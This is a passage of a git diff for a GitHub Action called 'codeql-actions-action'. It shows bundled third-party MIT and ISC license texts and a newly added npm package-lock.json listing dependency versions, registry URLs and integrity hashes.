WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/exec +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/http-client +MIT +Actions Http Client for Node.js + +Copyright (c) GitHub, Inc. + +All rights reserved. + +MIT License + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and +associated documentation files (the "Software"), to deal in the Software without restriction, +including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, +and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, +subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT +LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN +NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + + +@actions/io +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/tool-cache +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@fastify/busboy +MIT +Copyright Brian White. All rights reserved. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to +deal in the Software without restriction, including without limitation the +rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +sell copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +IN THE SOFTWARE. + +semver +ISC +The ISC License + +Copyright (c) Isaac Z. Schlueter and Contributors + +Permission to use, copy, modify, and/or distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies. + +THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR +IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + + +tunnel +MIT +The MIT License (MIT) + +Copyright (c) 2012 Koichi Kobayashi + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. + + +undici +MIT +MIT License + +Copyright (c) Matteo Collina and Undici contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + + +uuid +MIT +The MIT License (MIT) + +Copyright (c) 2010-2020 Robert Kieffer and other contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json new file mode 100644 index 000000000000..eef94f4b5cd8 --- /dev/null +++ b/.github/action/package-lock.json @@ -0,0 +1,639 @@ +{ + "name": "codeql-actions-action", + "version": "0.1.0", + "lockfileVersion": 2, + "requires": true, + "packages": { + "": { + "name": "codeql-actions-action", + "version": "0.1.0", + "license": "MIT", + "dependencies": { + "@actions/core": "^1.10.1", + "@actions/exec": "^1.1.1", + "@actions/github": "^5.1.1", + "@actions/tool-cache": "^2.0.1" + }, + "devDependencies": { + "@types/node": "^20.6.0", + "@vercel/ncc": "^0.38.0", + "prettier": "^3.0.3", + "typescript": "^5.2.2" + } + }, + "node_modules/@actions/core": { + "version": "1.10.1", + "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", + "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", + "dependencies": { + "@actions/http-client": "^2.0.1", + "uuid": "^8.3.2" + } + }, + "node_modules/@actions/exec": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", + "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", + "dependencies": { + "@actions/io": "^1.0.1" + } + }, + "node_modules/@actions/github": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", + "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", + "dependencies": { + "@actions/http-client": "^2.0.1", + "@octokit/core": "^3.6.0", + "@octokit/plugin-paginate-rest": "^2.17.0", + "@octokit/plugin-rest-endpoint-methods": "^5.13.0" + } + }, + "node_modules/@actions/http-client": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", + "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", + "dependencies": { + "tunnel": "^0.0.6", + "undici": "^5.25.4" + } + }, + "node_modules/@actions/io": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", + "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" + }, + "node_modules/@actions/tool-cache": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", + "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", + "dependencies": { + "@actions/core": "^1.2.6", + "@actions/exec": "^1.0.0", + "@actions/http-client": "^2.0.1", + "@actions/io": "^1.1.1", + "semver": "^6.1.0", + "uuid": "^3.3.2" + } + }, + "node_modules/@actions/tool-cache/node_modules/uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", + "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", + "bin": { + "uuid": "bin/uuid" + } + }, + "node_modules/@fastify/busboy": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", + "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@octokit/auth-token": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", + "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", + "dependencies": { + "@octokit/types": "^6.0.3" + } + }, + "node_modules/@octokit/core": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", + "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", + "dependencies": { + "@octokit/auth-token": "^2.4.4", + "@octokit/graphql": "^4.5.8", + "@octokit/request": "^5.6.3", + "@octokit/request-error": "^2.0.5", + "@octokit/types": "^6.0.3", + "before-after-hook": "^2.2.0", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/endpoint": { + "version": "6.0.12", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", + "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", + "dependencies": { + "@octokit/types": "^6.0.3", + "is-plain-object": "^5.0.0", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/graphql": { + "version": "4.8.0", + "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", + "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", + "dependencies": { + "@octokit/request": "^5.6.0", + "@octokit/types": "^6.0.3", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/openapi-types": { + "version": "12.11.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", + "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" + }, + "node_modules/@octokit/plugin-paginate-rest": { + "version": "2.21.3", + "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", + "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", + "dependencies": { + "@octokit/types": "^6.40.0" + }, + "peerDependencies": { + "@octokit/core": ">=2" + } + }, + "node_modules/@octokit/plugin-rest-endpoint-methods": { + "version": "5.16.2", + "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", + "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", + "dependencies": { + "@octokit/types": "^6.39.0", + "deprecation": "^2.3.1" + }, + "peerDependencies": { + "@octokit/core": ">=3" + } + }, + "node_modules/@octokit/request": { + "version": "5.6.3", + "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", + "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", + "dependencies": { + "@octokit/endpoint": "^6.0.1", + "@octokit/request-error": "^2.1.0", + "@octokit/types": "^6.16.1", + "is-plain-object": "^5.0.0", + "node-fetch": "^2.6.7", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/request-error": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", + "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", + "dependencies": { + "@octokit/types": "^6.0.3", + "deprecation": "^2.0.0", + "once": "^1.4.0" + } + }, + "node_modules/@octokit/types": { + "version": "6.41.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", + "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", + "dependencies": { + "@octokit/openapi-types": "^12.11.0" + } + }, + "node_modules/@types/node": { + "version": "20.11.19", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", + "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "dev": true, + "dependencies": { + "undici-types": "~5.26.4" + } + }, + "node_modules/@vercel/ncc": { + "version": "0.38.1", + "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", + "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", + "dev": true, + "bin": { + "ncc": "dist/ncc/cli.js" + } + }, + "node_modules/before-after-hook": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", + "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" + }, + "node_modules/deprecation": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", + "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" + }, + "node_modules/is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "dependencies": { + "whatwg-url": "^5.0.0" + }, + "engines": { + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/prettier": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", + "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", + "dev": true, + "bin": { + "prettier": "bin/prettier.cjs" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/prettier/prettier?sponsor=1" + } + }, + "node_modules/semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + }, + "node_modules/tunnel": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", + "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==", + "engines": { + "node": ">=0.6.11 <=0.7.0 || >=0.7.3" + } + }, + "node_modules/typescript": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", + "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", + "dev": true, + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, + "engines": { + "node": ">=14.17" + } + }, + "node_modules/undici": { + "version": "5.28.3", + "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", + "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", + "dependencies": { + "@fastify/busboy": "^2.0.0" + }, + "engines": { + "node": ">=14.0" + } + }, + "node_modules/undici-types": { + "version": "5.26.5", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", + "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", + "dev": true + }, + "node_modules/universal-user-agent": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", + "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" + }, + "node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" + }, + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "dependencies": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + } + }, + "dependencies": { + "@actions/core": { + "version": "1.10.1", + "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", + "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", + "requires": { + "@actions/http-client": "^2.0.1", + "uuid": "^8.3.2" + } + }, + "@actions/exec": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", + "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", + "requires": { + "@actions/io": "^1.0.1" + } + }, + "@actions/github": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", + "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", + "requires": { + "@actions/http-client": "^2.0.1", + "@octokit/core": "^3.6.0", + "@octokit/plugin-paginate-rest": "^2.17.0", + "@octokit/plugin-rest-endpoint-methods": "^5.13.0" + } + }, + "@actions/http-client": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", + "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", + "requires": { + "tunnel": "^0.0.6", + "undici": "^5.25.4" + } + }, + "@actions/io": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", + "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" + }, + "@actions/tool-cache": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", + "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", + "requires": { + "@actions/core": "^1.2.6", + "@actions/exec": "^1.0.0", + "@actions/http-client": "^2.0.1", + "@actions/io": "^1.1.1", + "semver": "^6.1.0", + "uuid": "^3.3.2" + }, + "dependencies": { + "uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" + } + } + }, + "@fastify/busboy": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", + "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==" + }, + "@octokit/auth-token": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", + "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", + "requires": { + "@octokit/types": "^6.0.3" + } + }, + "@octokit/core": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", + "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", + "requires": { + "@octokit/auth-token": "^2.4.4", + "@octokit/graphql": "^4.5.8", + "@octokit/request": "^5.6.3", + "@octokit/request-error": "^2.0.5", + "@octokit/types": "^6.0.3", + "before-after-hook": "^2.2.0", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/endpoint": { + "version": "6.0.12", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", + "integrity": 